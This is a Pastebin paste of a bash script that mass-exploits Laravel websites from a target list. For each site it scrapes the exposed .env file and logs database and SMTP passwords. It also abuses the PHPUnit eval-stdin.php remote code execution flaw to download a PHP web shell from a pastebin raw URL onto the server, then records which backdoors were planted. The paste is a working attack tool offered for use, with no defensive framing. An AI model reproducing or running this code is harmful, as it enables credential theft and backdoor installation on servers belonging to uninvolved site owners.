Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # CEPOTZ MMPPPSSSHHH AHHHH KNTL
- RD="\e[91m"
- GR="\e[92m"
- YL="\e[93m"
- WH="\e[97m"
- BL="\e[94m"
- CY="\e[96m"
- B="\e[1m"
- NC="\e[0m"
- rce(){
- # payload='uname -a;curl -skL https://pastebin.com/raw/f4xQX4sL -o cans.php'
- pathz='/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
- exploit=$(curl -skL --data '<?php echo "Cans21 :".system("uname -a;curl -skL https://pastebin.com/raw/f4xQX4sL -o cans.php").":";?>' "$1/$pathz")
- uname=$(echo $exploit | grep -Po "(?<=Cans21 :)[^:]*")
- if [[ ! -z $uname ]]; then
- rc="${GR}RCE${NC}"
- un="${GR}[*] Kernel : $uname${NC}${NC}"
- if [[ $(curl -s $1/vendor/phpunit/phpunit/src/Util/PHP/cans.php | grep -ic "Cans21") -eq 1 ]]; then
- shell="${GR}[*] Successfully Uploaded : ${CY}$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php${NC}"
- echo "$1/vendor/phpunit/phpunit/src/Util/PHP/cans.php" >> laravel-rce-log.txt
- else
- shell="${RD}[-] Failed Uploading Backdoor${NC}"
- fi
- else
- rc="${RD}RCE${NC}"
- fi
- }
- env(){
- exploit=$(curl -skL "$1/.env")
- db_host=$(echo $exploit | grep -Po '(?<=DB_HOST=)[^ ]*')
- db=$(echo $exploit | grep -Po '(?<=DB_DATABASE=)[^ ]*')
- db_u=$(echo $exploit | grep -Po '(?<=DB_USERNAME=)[^ ]*')
- db_p=$(echo $exploit | grep -Po '(?<=DB_PASSWORD=)[^ ]*')
- m_host=$(echo $exploit | grep -Po '(?<=MAIL_HOST=)[^ ]*')
- m_port=$(echo $exploit | grep -Po '(?<=MAIL_PORT=)[^ ]*')
- m_u=$(echo $exploit | grep -Po '(?<=MAIL_USERNAME=)[^ ]*')
- m_p=$(echo $exploit | grep -Po '(?<=MAIL_PASSWORD=)[^ ]*')
- if [[ -z $db_host ]]; then
- en="${RD}DB${NC}"
- else
- en="${GR}DB${NC}"
- dbs="${GR}\n [*] DB_HOST : $db_host\n [*] DB_DATABASE : $db\n [*] DB_USERNAME : $db_u\n [*] DB_PASSWORD : $db_p\n${NC}"
- echo "$1 | DATABASE : $db_host | $db | $db_u | $db_p" >> laravel-env-log.txt
- if [[ -z $m_host || $m_host == "null" || $m_host == "localhost" || $m_host == "mailtrap.io" || $m_host == "smtp.mailtrap.io" ]]; then
- sm="${RD}SMTP${NC}"
- else
- sm="${GR}SMTP${NC}"
- smtp="${GR}\n [*] MAIL_HOST : $m_host\n [*] MAIL_PORT : $m_port\n [*] MAIL_USERNAME : $m_u\n [*] MAIL_PASSWORD : $m_p\n${NC}"
- echo "$1 | SMTP : $m_host | $m_port | $m_u | $m_p" >> laravel-env-log.txt
- fi
- fi
- }
- exploit(){
- u=$(echo $1 | awk -F/ '{print $3}')
- env $u && rce $u
- echo -e "[$w][$2/$tot] $1 [$en][$sm][$rc]$dbs$smtp$loc"
- }
- read -p "[?] List Target : " list
- if [[ ! -f $list ]]; then
- echo "[-] File $list Not Exist!"
- exit 1
- fi
- read -p "[?] Threads (Default 10): " thread
- if [[ $thread="" ]]; then
- thread=10;
- fi
- read -p "[?] Delay (Default 1): " sleep
- if [[ $sleep="" ]]; then
- sleep=1;
- fi
- echo
- echo -e "[!] ${GR}Target Loaded : ${CY}$(wc -l $list)${NC}"
- echo -e "[!] ${GR}Thread : ${CY}$thread${NC}"
- echo -e "[!] ${GR}Delay : ${CY}$sleep sec${NC}"
- echo -e "[+] ${GR}Start Exploit.......${NC}\n"
- hitung=1
- IFS=$'\r\n' GLOBIGNORE='*' command eval 'target=($(cat $list))'
- for (( i = 0; i <"${#target[@]}"; i++ )); do
- targeto="${target[$i]}"
- ff=$(expr $hitung % $thread)
- if [[ $ff == 0 && $hitung > 0 ]]; then
- sleep $sleep
- fi
- w=$(date '+%H:%M:%S')
- tot=$(cat $list | wc -l)
- exploit $targeto $hitung &
- hitung=$[$hitung+1]
- done
- wait
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement